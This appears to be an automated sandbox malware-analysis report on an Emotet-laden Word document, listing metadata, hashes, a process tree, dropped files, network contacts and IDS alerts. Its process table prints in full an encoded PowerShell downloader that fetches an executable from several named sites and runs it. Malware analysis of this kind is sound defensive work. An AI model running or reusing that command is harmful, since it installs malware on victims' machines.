File name: | Doc 543228 318165.doc |
Full analysis: | https://app.any.run/tasks/82bf4c8c-7e29-4d04-93c1-cf7ef020e32e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 15, 2019, 13:56:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Movies, Subject: Roads, Author: Lempi Greenholt, Comments: seamless, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 23:43:00 2019, Last Saved Time/Date: Tue May 14 23:43:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0 |
MD5: | F0B8D0083EFDF5162118FFB7AC7A6944 |
SHA1: | 384BB6E06691E48AA3CEA3D76EC4EC7DF7B24E8D |
SHA256: | EDD7683434BF4B5DCF6E62052C0D260F9CE2824BCD2E7FC527680DC96CF84FA0 |
SSDEEP: | 3072:m77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qE6Q0DyRv7nG5osJ:m77HUUUUUUUUUUUUUUUUUUUT52VWxDyC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Manager: | Zemlak |
---|---|
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 197 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Bednar and Sons |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 169 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:05:14 22:43:00 |
CreateDate: | 2019:05:14 22:43:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | seamless |
Keywords: | - |
Author: | Lempi Greenholt |
Subject: | Roads |
Title: | Movies |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2932 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Doc 543228 318165.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2712 | powershell -enc JABTADUAMAA1ADMANwA1ADMAPQAnAFkAXwA2ADgAMgBfADQAJwA7ACQAQwA0ADkANwAxAF8AIAA9ACAAJwA2ADYANAAnADsAJABuAF8ANQA4ADkAXwA9ACcAaAA3ADAANgAwADIANwAnADsAJABaADIAMQAzADEAXwA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABDADQAOQA3ADEAXwArACcALgBlAHgAZQAnADsAJABPADMANgA4ADEAOQA9ACcAWAA2ADUAMwAwADQANQAwACcAOwAkAGgANwAyAF8AMgAzADMAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AYABlAFQALgB3AEUAYABCAEMATABpAEUAYABOAFQAOwAkAFEAMgAzAF8ANwBfAD0AJwBoAHQAdABwADoALwAvAGEAbgBnAGUAbAB5AG8AcwBoAC4AYwBvAG0ALwBhAG4AZAByAGUAYQBwAHUAdAByAGkAYQBuAGEALgBvAG4AbABpAG4AZQAvAFEAUwBTAFYASABrAEIAWQAvAEAAaAB0AHQAcAA6AC8ALwA0AGkAbQAuAHUAcwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGMATQBIAEcATgBXAFIATgAvAEAAaAB0AHQAcAA6AC8ALwBzAG8AbAB1AHQAaQBvAG4AcAB1AGIALgBkAHoALwB3AHAALQBhAGQAbQBpAG4ALwBNAGEAagBPAFEARwBwAEkALwBAAGgAdAB0AHAAOgAvAC8AYQBsAGEAbgBrAGkAcABwAGEAeAAuAGkAbgBmAG8ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATQB2AEEAWABvAGcAcwB4AHIAUQAvAEAAaAB0AHQAcAA6AC8ALwBwAGEAcgB0AHQAaQBtAGUAcABhAHoAYQByAGwAYQBtAGEALgBjAG8AbQAvAHMAaQB0AGUAbQBhAHAAcwAyADEAMgAvAGgAcgBVAHAAZQBsAGoASAAvACcALgBTAFAAbABJAFQAKAAnAEAAJwApADsAJABTADEAMgA3ADQAMgA9ACcAaQA3AF8AMQA1ADEAMQAnADsAZgBvAHIAZQBhAGMAaAAoACQAegA2ADgAXwBfADUAIABpAG4AIAAkAFEAMgAzAF8ANwBfACkAewB0AHIAeQB7ACQAaAA3ADIAXwAyADMAMwAuAGQAbwBXAE4ATABvAEEARABmAGkATABFACgAJAB6ADYAOABfAF8ANQAsACAAJABaADIAMQAzADEAXwA1ACkAOwAkAFUANwA1ADkAMwBfAD0AJwBWADIANQAwADMANgA3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAWgAyADEAMwAxAF8ANQApAC4ATABFAE4AZwBUAGgAIAAtAGcAZQAgADIANAA3ADEAMQApACAAewAmACgAJwBJAG4AJwArACcAdgBvAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaADIAMQAzADEAXwA1ADsAJABCADIAOABfADUAXwA9ACcAdQAxADUAMgA0ADIAJwA7AGIAcgBlAGEAawA7ACQAQQA0ADMANAAyADIAPQAnAHQAXwA1ADkANQAyACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAOQAxADYANAA1ADIANgA9ACcAQgA4AF8ANAA5ADMAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3748 | "C:\Users\admin\664.exe" | C:\Users\admin\664.exe | — | powershell.exe |
User: admin Company: Lovelysoft Integrity Level: MEDIUM Description: Process Manager Remote Server Exit code: 0 Version: 1.8.0.1800 | ||||
2844 | --43274a32 | C:\Users\admin\664.exe | 664.exe | |
User: admin Company: Lovelysoft Integrity Level: MEDIUM Description: Process Manager Remote Server Exit code: 0 Version: 1.8.0.1800 | ||||
1140 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 664.exe | |
User: admin Company: Lovelysoft Integrity Level: MEDIUM Description: Process Manager Remote Server Exit code: 0 Version: 1.8.0.1800 | ||||
2060 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe |
User: admin Company: Lovelysoft Integrity Level: MEDIUM Description: Process Manager Remote Server Version: 1.8.0.1800 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREA10.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2712 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4Q196U8BTWTZ5SQ1233W.temp | — | |
MD5:— | SHA256:— | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A0D7235B4D50FB7CB8D5649C365834BC | SHA256:6664D025F0137CE35BCB828739B37400C1214A15AAEA959AB886930CDEB5417F | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:F7822C53AD721458637797EAB9FF82DC | SHA256:F92DF4352F2DC252D78103B7A962ACB4EF1D0F06ECE5D51F8C0A877B880683B2 | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBF55D3F.wmf | wmf | |
MD5:7EBB58F665D41A16CBC122BEA8397D70 | SHA256:F658FF04F5AEF69F7C54F243F726BAAD1312D5ABC13E19D6AB7E5B118C9FE92A | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C3D634.wmf | wmf | |
MD5:ABE208E65C6E510734A4B4D1B51E684D | SHA256:5A9BF787E21CB05B32B256F41BE19BFD43100947FA67D16A4CD82C89CF9D4DAC | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5ABC7E62.wmf | wmf | |
MD5:158C99AF6EA016698D33894427DE775C | SHA256:068B9A016334B15C496E5DCA491D297FEB691CD03F30F913ED1614D9A85AED9C | |||
2844 | 664.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:EC101DF5494AA9C94FA36EB8CB4C154B | SHA256:C89521BEAFB0512674AA2379C2B3D088D5E9FC1974993B3DE36B1A5ACDD9D7DF | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\959DB9AD.wmf | wmf | |
MD5:E3441ADDB6CCFA2133AA6667D48E15C3 | SHA256:574A5C9309A62733C08D4E406651197CEBAE649F40ABF0E1846B9135D8D5E4AF | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CCB2543.wmf | wmf | |
MD5:9B65CF0D4A58398412C8EC8D16152AA9 | SHA256:8CE15822FFCF829484971BBBD8086F328535E55B3EC81398441956D8C82A7E39 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2712 | powershell.exe | 111.68.113.243:80 | angelyosh.com | Varnion Technology Semesta, PT | ID | suspicious |
Domain | IP | Reputation |
---|---|---|
angelyosh.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2712 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2712 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2712 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |